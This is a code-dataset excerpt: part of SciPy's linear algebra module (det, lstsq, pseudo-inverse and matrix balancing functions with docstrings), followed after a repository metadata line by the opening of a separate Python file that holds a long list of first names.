# XXX: the following line fixes curious SEGFAULT when
# benchmarking 500x500 matrix inverse. This seems to
# be a bug in LAPACK ?getri routine because if lwork is
# minimal (when using lwork[0] instead of lwork[1]) then
# all tests pass. Further investigation is required if
# more such SEGFAULTs occur.
lwork = int(1.01 * lwork)
inv_a, info = getri(lu, piv, lwork=lwork, overwrite_lu=1)
if info > 0:
raise LinAlgError("singular matrix")
if info < 0:
raise ValueError('illegal value in %d-th argument of internal '
'getrf|getri' % -info)
return inv_a
# Determinant
def det(a, overwrite_a=False, check_finite=True):
"""
Compute the determinant of a matrix
The determinant of a square matrix is a value derived arithmetically
from the coefficients of the matrix.
The determinant for a 3x3 matrix, for example, is computed as follows::
a    b    c
d    e    f = A
g    h    i
det(A) = a*e*i + b*f*g + c*d*h - c*e*g - b*d*i - a*f*h
Parameters
----------
a : (M, M) array_like
A square matrix.
overwrite_a : bool, optional
Allow overwriting data in a (may enhance performance).
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
det : float or complex
Determinant of `a`.
Notes
-----
The determinant is computed via LU factorization, LAPACK routine z/dgetrf.
Examples
--------
>>> from scipy import linalg
>>> a = np.array([[1,2,3], [4,5,6], [7,8,9]])
>>> linalg.det(a)
0.0
>>> a = np.array([[0,2,3], [4,5,6], [7,8,9]])
>>> linalg.det(a)
3.0
"""
a1 = _asarray_validated(a, check_finite=check_finite)
if len(a1.shape) != 2 or a1.shape[0] != a1.shape[1]:
raise ValueError('expected square matrix')
overwrite_a = overwrite_a or _datacopied(a1, a)
fdet, = get_flinalg_funcs(('det',), (a1,))
a_det, info = fdet(a1, overwrite_a=overwrite_a)
if info < 0:
raise ValueError('illegal value in %d-th argument of internal '
'det.getrf' % -info)
return a_det
# Linear Least Squares
def lstsq(a, b, cond=None, overwrite_a=False, overwrite_b=False,
check_finite=True, lapack_driver=None):
"""
Compute least-squares solution to equation Ax = b.
Compute a vector x such that the 2-norm ``|b - A x|`` is minimized.
Parameters
----------
a : (M, N) array_like
Left hand side array
b : (M,) or (M, K) array_like
Right hand side array
cond : float, optional
Cutoff for 'small' singular values; used to determine effective
rank of `a`. Singular values smaller than
``cond * largest_singular_value`` are considered zero.
overwrite_a : bool, optional
Discard data in `a` (may enhance performance). Default is False.
overwrite_b : bool, optional
Discard data in `b` (may enhance performance). Default is False.
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
lapack_driver : str, optional
Which LAPACK driver is used to solve the least-squares problem.
Options are ``'gelsd'``, ``'gelsy'``, ``'gelss'``. Default
(``'gelsd'``) is a good choice. However, ``'gelsy'`` can be slightly
faster on many problems. ``'gelss'`` was used historically. It is
generally slow but uses less memory.
.. versionadded:: 0.17.0
Returns
-------
x : (N,) or (N, K) ndarray
Least-squares solution. Return shape matches shape of `b`.
residues : (K,) ndarray or float
Square of the 2-norm for each column in ``b - a x``, if ``M > N`` and
``rank(a) == N`` (returns a scalar if `b` is 1-D). Otherwise a
(0,)-shaped array is returned.
rank : int
Effective rank of `a`.
s : (min(M, N),) ndarray or None
Singular values of `a`. The condition number of a is
``abs(s[0] / s[-1])``.
Raises
------
LinAlgError
If computation does not converge.
ValueError
When parameters are not compatible.
See Also
--------
scipy.optimize.nnls : linear least squares with non-negativity constraint
Notes
-----
When ``'gelsy'`` is used as a driver, `residues` is set to a (0,)-shaped
array and `s` is always ``None``.
Examples
--------
>>> from scipy.linalg import lstsq
>>> import matplotlib.pyplot as plt
Suppose we have the following data:
>>> x = np.array([1, 2.5, 3.5, 4, 5, 7, 8.5])
>>> y = np.array([0.3, 1.1, 1.5, 2.0, 3.2, 6.6, 8.6])
We want to fit a quadratic polynomial of the form ``y = a + b*x**2``
to this data. We first form the "design matrix" M, with a constant
column of 1s and a column containing ``x**2``:
>>> M = x[:, np.newaxis]**[0, 2]
>>> M
array([[ 1. , 1. ],
[ 1. , 6.25],
[ 1. , 12.25],
[ 1. , 16. ],
[ 1. , 25. ],
[ 1. , 49. ],
[ 1. , 72.25]])
We want to find the least-squares solution to ``M.dot(p) = y``,
where ``p`` is a vector with length 2 that holds the parameters
``a`` and ``b``.
>>> p, res, rnk, s = lstsq(M, y)
>>> p
array([ 0.20925829, 0.12013861])
Plot the data and the fitted curve.
>>> plt.plot(x, y, 'o', label='data')
>>> xx = np.linspace(0, 9, 101)
>>> yy = p[0] + p[1]*xx**2
>>> plt.plot(xx, yy, label='least squares fit, $y = a + bx^2$')
>>> plt.xlabel('x')
>>> plt.ylabel('y')
>>> plt.legend(framealpha=1, shadow=True)
>>> plt.grid(alpha=0.25)
>>> plt.show()
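A different LAPACK driver can be selected as noted above; a minimal
sketch using ``'gelsy'``, for which the singular values are not
computed and `s` is returned as None:
>>> p2, res2, rnk2, s2 = lstsq(M, y, lapack_driver='gelsy')
>>> np.allclose(p, p2)
True
>>> s2 is None
True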
"""
a1 = _asarray_validated(a, check_finite=check_finite)
b1 = _asarray_validated(b, check_finite=check_finite)
if len(a1.shape) != 2:
raise ValueError('Input array a should be 2-D')
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
if m != b1.shape[0]:
raise ValueError('Shape mismatch: a and b should have the same number'
' of rows ({} != {}).'.format(m, b1.shape[0]))
if m == 0 or n == 0: # Zero-sized problem, confuses LAPACK
x = np.zeros((n,) + b1.shape[1:], dtype=np.common_type(a1, b1))
if n == 0:
residues = np.linalg.norm(b1, axis=0)**2
else:
residues = np.empty((0,))
return x, residues, 0, np.empty((0,))
driver = lapack_driver
if driver is None:
driver = lstsq.default_lapack_driver
if driver not in ('gelsd', 'gelsy', 'gelss'):
raise ValueError('LAPACK driver "%s" is not found' % driver)
lapack_func, lapack_lwork = get_lapack_funcs((driver,
'%s_lwork' % driver),
(a1, b1))
real_data = (lapack_func.dtype.kind == 'f')
if m < n:
# need to extend b matrix as it will be filled with
# a larger solution matrix
if len(b1.shape) == 2:
b2 = np.zeros((n, nrhs), dtype=lapack_func.dtype)
b2[:m, :] = b1
else:
b2 = np.zeros(n, dtype=lapack_func.dtype)
b2[:m] = b1
b1 = b2
overwrite_a = overwrite_a or _datacopied(a1, a)
overwrite_b = overwrite_b or _datacopied(b1, b)
if cond is None:
cond = np.finfo(lapack_func.dtype).eps
if driver in ('gelss', 'gelsd'):
if driver == 'gelss':
lwork = _compute_lwork(lapack_lwork, m, n, nrhs, cond)
v, x, s, rank, work, info = lapack_func(a1, b1, cond, lwork,
overwrite_a=overwrite_a,
overwrite_b=overwrite_b)
elif driver == 'gelsd':
if real_data:
lwork, iwork = _compute_lwork(lapack_lwork, m, n, nrhs, cond)
x, s, rank, info = lapack_func(a1, b1, lwork,
iwork, cond, False, False)
else: # complex data
lwork, rwork, iwork = _compute_lwork(lapack_lwork, m, n,
nrhs, cond)
x, s, rank, info = lapack_func(a1, b1, lwork, rwork, iwork,
cond, False, False)
if info > 0:
raise LinAlgError("SVD did not converge in Linear Least Squares")
if info < 0:
raise ValueError('illegal value in %d-th argument of internal %s'
% (-info, lapack_driver))
resids = np.asarray([], dtype=x.dtype)
if m > n:
x1 = x[:n]
if rank == n:
resids = np.sum(np.abs(x[n:])**2, axis=0)
x = x1
return x, resids, rank, s
elif driver == 'gelsy':
lwork = _compute_lwork(lapack_lwork, m, n, nrhs, cond)
jptv = np.zeros((a1.shape[1], 1), dtype=np.int32)
v, x, j, rank, info = lapack_func(a1, b1, jptv, cond,
lwork, False, False)
if info < 0:
raise ValueError("illegal value in %d-th argument of internal "
"gelsy" % -info)
if m > n:
x1 = x[:n]
x = x1
return x, np.array([], x.dtype), rank, None
lstsq.default_lapack_driver = 'gelsd'
def pinv(a, cond=None, rcond=None, return_rank=False, check_finite=True):
"""
Compute the (Moore-Penrose) pseudo-inverse of a matrix.
Calculate a generalized inverse of a matrix using a least-squares
solver.
Parameters
----------
a : (M, N) array_like
Matrix to be pseudo-inverted.
cond, rcond : float, optional
Cutoff for 'small' singular values in the least-squares solver.
Singular values smaller than ``rcond * largest_singular_value``
are considered zero.
return_rank : bool, optional
if True, return the effective rank of the matrix
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
B : (N, M) ndarray
The pseudo-inverse of matrix `a`.
rank : int
The effective rank of the matrix. Returned if return_rank == True
Raises
------
LinAlgError
If computation does not converge.
Examples
--------
>>> from scipy import linalg
>>> a = np.random.randn(9, 6)
>>> B = linalg.pinv(a)
>>> np.allclose(a, np.dot(a, np.dot(B, a)))
True
>>> np.allclose(B, np.dot(B, np.dot(a, B)))
True
"""
a = _asarray_validated(a, check_finite=check_finite)
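# The pseudo-inverse is obtained as the least-squares solution of
# a x = I, with one identity column per right-hand side.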
b = np.identity(a.shape[0], dtype=a.dtype)
if rcond is not None:
cond = rcond
x, resids, rank, s = lstsq(a, b, cond=cond, check_finite=False)
if return_rank:
return x, rank
else:
return x
def pinv2(a, cond=None, rcond=None, return_rank=False, check_finite=True):
"""
Compute the (Moore-Penrose) pseudo-inverse of a matrix.
Calculate a generalized inverse of a matrix using its
singular-value decomposition and including all 'large' singular
values.
Parameters
----------
a : (M, N) array_like
Matrix to be pseudo-inverted.
cond, rcond : float or None
Cutoff for 'small' singular values.
Singular values smaller than ``rcond*largest_singular_value``
are considered zero.
If None or -1, suitable machine precision is used.
return_rank : bool, optional
if True, return the effective rank of the matrix
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
B : (N, M) ndarray
The pseudo-inverse of matrix `a`.
rank : int
The effective rank of the matrix. Returned if return_rank == True
Raises
------
LinAlgError
If SVD computation does not converge.
Examples
--------
>>> from scipy import linalg
>>> a = np.random.randn(9, 6)
>>> B = linalg.pinv2(a)
>>> np.allclose(a, np.dot(a, np.dot(B, a)))
True
>>> np.allclose(B, np.dot(B, np.dot(a, B)))
True
"""
a = _asarray_validated(a, check_finite=check_finite)
u, s, vh = decomp_svd.svd(a, full_matrices=False, check_finite=False)
if rcond is not None:
cond = rcond
if cond in [None, -1]:
t = u.dtype.char.lower()
factor = {'f': 1E3, 'd': 1E6}
cond = factor[t] * np.finfo(t).eps
rank = np.sum(s > cond * np.max(s))
u = u[:, :rank]
u /= s[:rank]
B = np.transpose(np.conjugate(np.dot(u, vh[:rank])))
if return_rank:
return B, rank
else:
return B
def pinvh(a, cond=None, rcond=None, lower=True, return_rank=False,
check_finite=True):
"""
Compute the (Moore-Penrose) pseudo-inverse of a Hermitian matrix.
Calculate a generalized inverse of a Hermitian or real symmetric matrix
using its eigenvalue decomposition and including all eigenvalues with
'large' absolute value.
Parameters
----------
a : (N, N) array_like
Real symmetric or complex Hermitian matrix to be pseudo-inverted
cond, rcond : float or None
Cutoff for 'small' eigenvalues.
Eigenvalues smaller in absolute value than ``rcond`` times the largest
absolute eigenvalue are considered zero.
If None or -1, suitable machine precision is used.
lower : bool, optional
Whether the pertinent array data is taken from the lower or upper
triangle of a. (Default: lower)
return_rank : bool, optional
if True, return the effective rank of the matrix
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
B : (N, N) ndarray
The pseudo-inverse of matrix `a`.
rank : int
The effective rank of the matrix. Returned if return_rank == True
Raises
------
LinAlgError
If eigenvalue does not converge
Examples
--------
>>> from scipy.linalg import pinvh
>>> a = np.random.randn(9, 6)
>>> a = np.dot(a, a.T)
>>> B = pinvh(a)
>>> np.allclose(a, np.dot(a, np.dot(B, a)))
True
>>> np.allclose(B, np.dot(B, np.dot(a, B)))
True
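The effective rank can be requested as well; a minimal sketch (here `a`
is the 9x9 product of a random 9x6 matrix with its transpose, so its
rank is almost surely 6):
>>> B, rank = pinvh(a, return_rank=True)
>>> rank
6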
"""
a = _asarray_validated(a, check_finite=check_finite)
s, u = decomp.eigh(a, lower=lower, check_finite=False)
if rcond is not None:
cond = rcond
if cond in [None, -1]:
t = u.dtype.char.lower()
factor = {'f': 1E3, 'd': 1E6}
cond = factor[t] * np.finfo(t).eps
# For Hermitian matrices, singular values equal abs(eigenvalues)
above_cutoff = (abs(s) > cond * np.max(abs(s)))
psigma_diag = 1.0 / s[above_cutoff]
u = u[:, above_cutoff]
B = np.dot(u * psigma_diag, np.conjugate(u).T)
if return_rank:
return B, len(psigma_diag)
else:
return B
def matrix_balance(A, permute=True, scale=True, separate=False,
overwrite_a=False):
"""
Compute a diagonal similarity transformation for row/column balancing.
The balancing tries to equalize the row and column 1-norms by applying
a similarity transformation such that the magnitude variation of the
matrix entries is absorbed into the scaling matrices.
Moreover, if enabled, the matrix is first permuted to isolate the upper
triangular parts of the matrix and, again if scaling is also enabled,
only the remaining subblocks are subjected to scaling.
The balanced matrix satisfies the following equality
.. math::
B = T^{-1} A T
The scaling coefficients are approximated to the nearest power of 2
to avoid round-off errors.
Parameters
----------
A : (n, n) array_like
Square data matrix for the balancing.
permute : bool, optional
The selector to define whether permutation of A is also performed
prior to scaling.
scale : bool, optional
The selector to turn on and off the scaling. If False, the matrix
will not be scaled.
separate : bool, optional
This switches from returning a full matrix of the transformation
to a tuple of two separate 1D permutation and scaling arrays.
overwrite_a : bool, optional
This is passed to xGEBAL directly. Essentially, the result is written
over the input data, which might increase space efficiency. See the
LAPACK manual for details. This is False by default.
Returns
-------
B : (n, n) ndarray
Balanced matrix
T : (n, n) ndarray
A possibly permuted diagonal matrix whose nonzero entries are
integer powers of 2 to avoid numerical truncation errors.
scale, perm : (n,) ndarray
If ``separate`` keyword is set to True then instead of the array
``T`` above, the scaling and the permutation vectors are given
separately as a tuple without allocating the full array ``T``.
Notes
-----
This algorithm is particularly useful for eigenvalue and matrix
decompositions and in many cases it is already called by various
LAPACK routines.
The algorithm is based on the well-known technique of [1]_ and has
been modified to account for special cases. See [2]_ for details
which have been implemented since LAPACK v3.5.0. Before this version
there are corner cases where balancing can actually worsen the
conditioning. See [3]_ for such examples.
The code is a wrapper around LAPACK's xGEBAL routine family for matrix
balancing.
.. versionadded:: 0.19.0
Examples
--------
>>> from scipy import linalg
>>> x = np.array([[1,2,0], [9,1,0.01], [1,2,10*np.pi]])
>>> y, permscale = linalg.matrix_balance(x)
>>> np.abs(x).sum(axis=0) / np.abs(x).sum(axis=1)
array([ 3.66666667, 0.4995005 , 0.91312162])
>>> np.abs(y).sum(axis=0) / np.abs(y).sum(axis=1)
array([ 1.2 , 1.27041742, 0.92658316]) # may vary
>>> permscale # only powers of 2 (0.5 == 2^(-1))
array([[ 0.5, 0. , 0. ], # may vary
[ 0. , 1. , 0. ],
[ 0. , 0. , 1. ]])
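With ``separate=True``, the scaling and permutation vectors are returned
instead of the full transformation matrix; a minimal sketch reusing the
input above (``yb``, ``scale`` and ``perm`` are illustrative names):
>>> yb, (scale, perm) = linalg.matrix_balance(x, separate=True)
>>> np.allclose(y, yb)
True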
References
----------
.. [1] : B.N. Parlett and C. Reinsch, "Balancing a Matrix for
Calculation of Eigenvalues and Eigenvectors", Numerische Mathematik,
Vol.13(4), 1969, DOI:10.1007/BF02165404
.. [2] : R. James, J. Langou, B.R. Lowery, "On matrix balancing and
eigenvector computation", 2014, Available online:
https://arxiv.org/abs/1401.5766
.. [3] : D.S. Watkins. A case where balancing is harmful.
Electron. Trans. Numer. Anal, Vol.23, 2006.
"""
A = np.atleast_2d(_asarray_validated(A, check_finite=True))
if not np.equal(*A.shape):
raise ValueError('The data matrix for balancing should be square.')
gebal = get_lapack_funcs(('gebal'), (A,))
B, lo, hi, ps, info = gebal(A, scale=scale, permute=permute,
overwrite_a=overwrite_a)
if info < 0:
raise ValueError('xGEBAL exited with the internal error '
'"illegal value in argument number {}.". See '
'LAPACK documentation for the xGEBAL error codes.'
''.format(-info))
# Separate the permutations from the scalings and then convert to int
scaling = np.ones_like(ps, dtype=float)
scaling[lo:hi+1] = ps[lo:hi+1]
# gebal uses 1-indexing
ps = ps.astype(int, copy=False) - 1
n = A.shape[0]
perm = np.arange(n)
# LAPACK permutes with the ordering n --> hi, then 0--> lo
if hi < n:
for ind, x in enumerate(ps[hi+1:][::-1], 1):
if n-ind == x:
continue
perm[[x, n-ind]] = perm[[n-ind, x]]
if lo > 0:
for ind, x in enumerate(ps[:lo]):
if ind == x:
continue
perm[[x, ind]] = perm[[ind, x]]
if separate:
return B, (scaling, perm)
# get the inverse permutation
iperm = np.empty_like(perm)
iperm[perm] = np.arange(n)
return B, np.diag(scaling)[iperm, :]
| Eric89GXL/scipy | scipy/linalg/basic.py | Python | bsd-3-clause | 55,293 |
names = [ # NOQA
'Aan',
'Aalia',
'Aaliah',
'Aaliyah',
'Aaron',
'Aaryanna',
'Aavree',
'Abbie',
'Abbott',
'Abbra',
'Abby',
'Abe',
'Abel',
'Abelardo',
'Abeni',
'Abia',
'Abiba',
'Abie',
'Abigail',
'Abner',
'Abraham',
'Abram',
'Abrial',
'Abrianna',
'Abrienda',
'Abril',
'Abryl',
'Absolom',
'Abu',
'Acacia',
'Acadia',
'Ace',
'Achika',
'Acsah; achsah',
'Ada',
'Adabeel',
'Adah',
'Adair',
'Adalia',
'Adam',
'Adamina',
'Adamma',
'Adara',
'Addison',
'Ade',
'Adela',
'Adelaide',
'Adele',
'Adeline',
'Adelio',
'Adelle',
'Adem',
'Aden',
'Aderes',
'Adian',
'Adie',
'Adiel',
'Adil',
'Adila',
'Adina',
'Adir',
'Adita',
'Adkins',
'Adlai',
'Adler',
'Adli',
'Adolfo',
'Adolph',
'Adonai',
'Adonia',
'Adonijah',
'Adora',
'Adra',
'Adrian',
'Adriana',
'Adriano',
'Adriel',
'Adrienne',
'Adrina',
'Ady',
'Aelan',
'Aeyesha',
'Affrica',
'Afra',
'Afric',
'Africa',
'Afton',
'Agamemnon',
'Agatha',
'Aggie',
'Agnes',
'Ah cy',
'Ahava',
'Ai',
'Aida',
'Aidan',
'Aiko',
'Aileen',
'Ailis',
'Ailish',
'Ailo',
'Aimee',
'Aine',
'Ainsley',
'Aisha',
'Aisleigh',
'Aisling',
'Aislinn',
'Aiyan',
'Aizza',
'Aja',
'Ajani',
'Ajay',
'Ajel',
'Akeel',
'Akeem',
'Akili',
'Akira',
'Akoya',
'Akuji',
'Al',
'Alaina',
'Alair',
'Alake',
'Alan',
'Alana',
'Alanna',
'Alara',
'Alastair',
'Alaura',
'Alazne',
'Alban',
'Albany',
'Albert',
'Alberta',
'Alberto',
'Albin',
'Albina',
'Alda',
'Aldan',
'Alden',
'Alder',
'Aldina',
'Aldo',
'Aldon',
'Aldona',
'Alec',
'Aleda',
'Alejandra',
'Alejandro',
'Alem',
'Alena',
'Alesia',
'Alessa',
'Aleta',
'Aletha',
'Alethea',
'Aletta',
'Alex',
'Alexa',
'Alexander',
'Alexandra',
'Alexandria',
'Alexei',
'Alexia',
'Alexis',
'Alexsandra',
'Alfonso',
'Alfred',
'Algeron',
'Ali',
'Alia',
'Alice',
'Alicia',
'Alida',
'Alijah',
'Alika',
'Alima',
'Alina',
'Alisa',
'Alisha',
'Alison',
'Alissa',
'Alitza',
'Alivia',
'Aliya',
'Aliyah',
'Aliza',
'Alize',
'Alka',
'Allegra',
'Allen',
'Allene',
'Allie',
'Allison',
'Allyson',
'Alma',
'Almeda',
'Alohilani',
'Alonzo',
'Aloysius',
'Alphonse',
'Alsatia',
'Alta',
'Altagrace',
'Althea',
'Alva',
'Alvin',
'Alyanah',
'Alyn',
'Alyse & alysse',
'Alyson',
'Alyssa',
'Amadeus',
'Amador',
'Amalia',
'Amalie',
'Aman',
'Amana',
'Amanda',
'Amandla',
'Amara',
'Amaranta',
'Amarante',
'Amaranth',
'Amaris',
'Amaryllis',
'Amaya',
'Amber',
'Ambrose',
'Ambrosia',
'Ame',
'Amelia',
'Amena',
'America',
'Amerigo',
'Ami',
'Amia',
'Amie',
'Amiel',
'Amilynne',
'Amina',
'Amir',
'Amiri',
'Amity',
'Amma',
'Amorina',
'Amos',
'Amy',
'An',
'Ana',
'Anabelle',
'Anahi',
'Anais',
'Anaiya',
'Analiese',
'Analise',
'Anana',
'Anando',
'Anastasia',
'Anatola',
'Anatole',
'Ande',
'Andra',
'Andralyn',
'Andre',
'Andrea',
'Andreas',
'Andres',
'Andrew',
'Andy',
'Anecia',
'Aneesa',
'Anel',
'Anemone',
'Anevay',
'Angel',
'Angela',
'Angelica',
'Angelina',
'Angelo',
'Angie',
'Angus',
'Anh',
'Ani',
'Ania',
'Anibal',
'Anika',
'Anila',
'Anisa',
'Anita',
'Anitra',
'Anja',
'Anlon',
'Ann',
'Anna',
'Annakin',
'Annalise',
'Annamae',
'Annamika',
'Anne',
'Anneke',
'Annette',
'Annice',
'Annick',
'Annika (anika, aneka)',
'Annis',
'Annissa',
'Anniyyah',
'Annora',
'Annot',
'Ansley',
'Anthea',
'Anthony',
'Anthy',
'Antigone',
'Antionette',
'Antipholus',
'Antoine',
'Antoinette',
'Antonia',
'Antonie',
'Antonio',
'Antony',
'Anu',
'Anwar',
'Anya',
'Aoko',
'Aolani',
'Aowyn',
'Aphrodite',
'Apollo',
'Appollo',
'Apria',
'April',
'Aquila',
'Arabela',
'Arabella',
'Araceli',
'Aram',
'Aran',
'Aravis',
'Arch',
'Archibald',
'Archie',
'Ardith',
'Aren',
'Aretha',
'Argus',
'Ari',
'Aria',
'Ariana',
'Ariel',
'Ariella',
'Arielle',
'Arien',
'Aries',
'Arissa',
'Arista',
'Ariza',
'Arkadiy',
'Arland',
'Arlen',
'Arlene',
'Arlo',
'Arlynda',
'Armand',
'Armande',
'Armando',
'Armelle',
'Armetha',
'Armina',
'Armon',
'Arnaud',
'Arne',
'Arnie',
'Arnold',
'Aron',
'Aroq',
'Arpan',
'Art',
'Artemis',
'Arthur',
'Artie',
'Arty',
'Arvid',
'Arvin',
'Aryiah',
'Aryka',
'Asa',
'Asabi',
'Asalie',
'Asasia',
'Ash',
'Asha',
'Ashai',
'Ashby',
'Asher',
'Ashlea',
'Ashlee',
'Ashleigh',
'Ashley',
'Ashlie',
'Ashling',
'Ashlyn',
'Ashtin',
'Ashton',
'Ashtyn',
'Asia',
'Asis',
'Asli',
'Asnee',
'Aspen',
'Asta',
'Asthore',
'Astin',
'Astra',
'Astrid',
'Atalo',
'Athalia',
'Athena',
'Atira',
'Atlas',
'Atreyu',
'Atticus',
'Attylaka',
'Auberta',
'Aubrey',
'Aubrianna',
'Audi',
'Audra',
'Audrey',
'August',
'Augustin',
'Augustus',
'Auhna',
'Aulii',
'Aure',
'Aurelia',
'Aurora',
'Aurorette',
'Austin',
'Autumn',
'Ava',
'Avalie',
'Avalon',
'Avel',
'Aveline',
'Avery',
'Avi',
'Avianna',
'Avis',
'Avital',
'Aviv',
'Aviva',
'Avongara',
'Axel',
'Axelle',
'Aya',
'Ayame',
'Ayanna',
'Ayeka',
'Ayla',
'Aylieah',
'Aylira',
'Ayoka',
'Aysha',
'Azana',
'Aziza',
'Azize',
'Azra',
'Azriel',
'Azuka',
'Azura',
'Azza',
'Baba',
'Babette',
'Bagley',
'Bahari',
'Bailey',
'Baird',
'Bairn',
'Bakula',
'Ballard',
'Balthasar',
'Balu',
'Bambi',
'Banji',
'Barake',
'Barb',
'Barbara',
'Barbie',
'Barclay',
'Bari',
'Barke',
'Barnabas',
'Barnard',
'Barney',
'Barny',
'Barr',
'Barran',
'Barrett',
'Barretta',
'Barry',
'Bart',
'Barth',
'Bartholemew',
'Barto',
'Barton',
'Baruch',
'Bary',
'Bash',
'Basil',
'Basiliso',
'Bast',
'Bastien',
'Baxter',
'Bayard',
'Bayen',
'Baylee',
'Bayo',
'Bea',
'Beata',
'Beate',
'Beatrice',
'Beatriz',
'Beau',
'Beauregard',
'Bebe',
'Bebhin',
'Becca',
'Beck',
'Becka',
'Becky',
'Bel',
'Bela',
'Belay',
'Belden',
'Belen',
'Belinda',
'Belita',
'Bell',
'Bella',
'Belle',
'Bellini',
'Ben',
'Bena',
'Benard',
'Benedict & benedicta',
'Benen',
'Benita',
'Benjamin',
'Benjy',
'Bennett',
'Benny',
'Benson',
'Berdine',
'Berg',
'Berke',
'Bern',
'Bernadette',
'Bernadine',
'Bernard',
'Berne',
'Bernice',
'Bernie',
'Berny',
'Bert',
'Bertha',
'Bertille',
'Beryl',
'Bess',
'Bessie',
'Beth',
'Bethan',
'Bethany',
'Betsy',
'Bette',
'Bettina',
'Betty',
'Beulah',
'Bevan',
'Beverly',
'Bevis',
'Beyla',
'Biana',
'Bianca',
'Bibiane',
'Bidelia',
'Bikita',
'Bilen',
'Bill',
'Billy',
'Bin',
'Bina',
'Bing',
'Bingham',
'Birch',
'Bisbee',
'Bishop',
'Biton',
'Bjorn',
'Blade',
'Blaine',
'Blair',
'Blaise',
'Blake',
'Blanche',
'Blaze',
'Blenda',
'Blinda',
'Bliss',
'Blithe',
'Blodwyn',
'Blossom',
'Blum',
'Bluma',
'Bly',
'Blythe',
'Bo',
'Boaz',
'Bob',
'Bodee',
'Bona',
'Bonaventure',
'Bond',
'Bonita',
'Bonna',
'Bonnie',
'Bono',
'Boone',
'Boris',
'Botarea',
'Bowen',
'Bowie',
'Boyd',
'Bracha',
'Brad',
'Bradden',
'Braden',
'Bradford',
'Bradley',
'Brady',
'Braeden',
'Braima',
'Bran',
'Brand',
'Brandee',
'Branden',
'Brandi',
'Brandie',
'Brandon',
'Brandy',
'Branellan',
'Brant',
'Braxton',
'Brayden',
'Brazil',
'Breanna',
'Breckin',
'Brede',
'Bree',
'Brein',
'Brend',
'Brenda',
'Brendan',
'Brenden',
'Brendon',
'Brenna',
'Brennan',
'Brennon',
'Brent',
'Brett',
'Brewster',
'Brian',
'Briana',
'Brianna',
'Brianne',
'Briar',
'Brice',
'Brick',
'Bridget',
'Bridgit',
'Brie',
'Brielle',
'Brier',
'Brigham',
'Brighton',
'Brigit',
'Brigitte',
'Brilane',
'Brilliant',
'Brin',
'Brina',
'Brinkley',
'Brinly',
'Brit',
'Brita',
'Britain',
'Britannia',
'Britany',
'Britt',
'Britt-marie',
'Brittani',
'Brittany',
'Brittnee & brittney',
'Brock',
'Brody',
'Bron',
'Brondyn',
'Brone',
'Bronson',
'Bronwen',
'Brooke',
'Brooklyn',
'Brooks',
'Bruce',
'Bruno',
'Bryan',
'Bryanne',
'Bryant',
'Bryce',
'Brygid',
'Brynn',
'Bryony',
'Bryton',
'Buck',
'Bud',
'Buddy',
'Buffi',
'Buffy',
'Buford',
'Bunny',
'Burdette',
'Burke',
'Burlak',
'Burt',
'Burton',
'Butterfly',
'Buzz',
'Byrd',
'Byron',
'Cade',
'Cadee',
'Caden',
'Cadence',
'Cady',
'Cael',
'Caelan',
'Caeley',
'Caesar',
'Cai',
'Cailean',
'Caimile',
'Cain',
'Caine',
'Caique',
'Cairbre',
'Cairo',
'Cais',
'Caitlin',
'Caitlyn',
'Cal',
'Cala',
'Calais',
'Calandra',
'Calantha',
'Calder',
'Cale',
'Caleah',
'Caleb',
'Caley',
'Calhoun',
'Calix',
'Calixte',
'Calla',
'Callia',
'Calliope',
'Callista',
'Callum',
'Calvin',
'Calvine',
'Calypso',
'Cam',
'Cambria',
'Camden',
'Camdyn',
'Cameron',
'Camilla',
'Camille',
'Camilo',
'Camlin',
'Cana',
'Canaan',
'Candace',
'Candice',
'Candida',
'Candide',
'Candie',
'Candy',
'Cannon',
'Capri',
'Caprice',
'Caquise',
'Cara',
'Caralee',
'Caresse',
'Carey',
'Carha',
'Cari',
'Carina',
'Carissa',
'Carl',
'Carla',
'Carleton',
'Carley',
'Carlie',
'Carlisle',
'Carlos',
'Carlota',
'Carlotta',
'Carlton',
'Carly',
'Carmel',
'Carmela',
'Carmelita',
'Carmen',
'Carmine',
'Carol',
'Carolena',
'Carolina',
'Caroline',
'Carolyn',
'Caron',
'Carra',
'Carr',
'Carrick',
'Carrie',
'Carrieann',
'Carson',
'Carsyn',
'Carter',
'Carver',
'Cary',
'Casandra',
'Casey',
'Cashlin',
'Casimir',
'Casondra',
'Caspar',
'Casper',
'Cassandra',
'Cassee',
'Cassia',
'Cassidy',
'Cassie',
'Cassius',
'Castel',
'Catalin',
'Catherine',
'Cathy',
'Catrin',
'Caven',
'Cayla',
'Ceana',
'Cearo',
'Cece',
'Cecil',
'Cecile',
'Cecilia',
'Cecily',
'Cedric',
'Celeste',
'Celestyn',
'Celia',
'Celina',
'Celine',
'Cera',
'Cerise',
'Cesar',
'Ceylan',
'Chad',
'Chaela',
'Chaeli',
'Chailyn',
'Chaim',
'Chakotay',
'Chalina',
'Chalsie',
'Chana',
'Chance',
'Chancellor',
'Chandler',
'Chandra',
'Chanel',
'Chanell',
'Chanelle',
'Chaney',
'Channing',
'Channon',
'Chantal',
'Chantel',
'Chaplin',
'Chardonnay',
'Charis',
'Charisse',
'Charity',
'Charla',
'Charlee',
'Charleigh',
'Charlene',
'Charles',
'Charlet',
'Charlin',
'Charlot',
'Charlotte',
'Charmaine',
'Charo',
'Chars',
'Charu',
'Chas',
'Chase',
'Chastity',
'Chauncey',
'Chava',
'Chavi',
'Chay',
'Chaya',
'Chaylse',
'Chayza',
'Cheche',
'Chelsa',
'Chelsea',
'Chelsey',
'Chelsi',
'Chelsia',
'Chen',
'Cheney',
'Chenoa',
'Cher',
'Cheri',
'Cherie',
'Cherish',
'Cherlin',
'Cherry',
'Cheryl',
'Chesna',
'Chester',
'Cheston',
'Chet',
'Cheyenne',
'Cheyne',
'Chezarina',
'Chhaya',
'Chia',
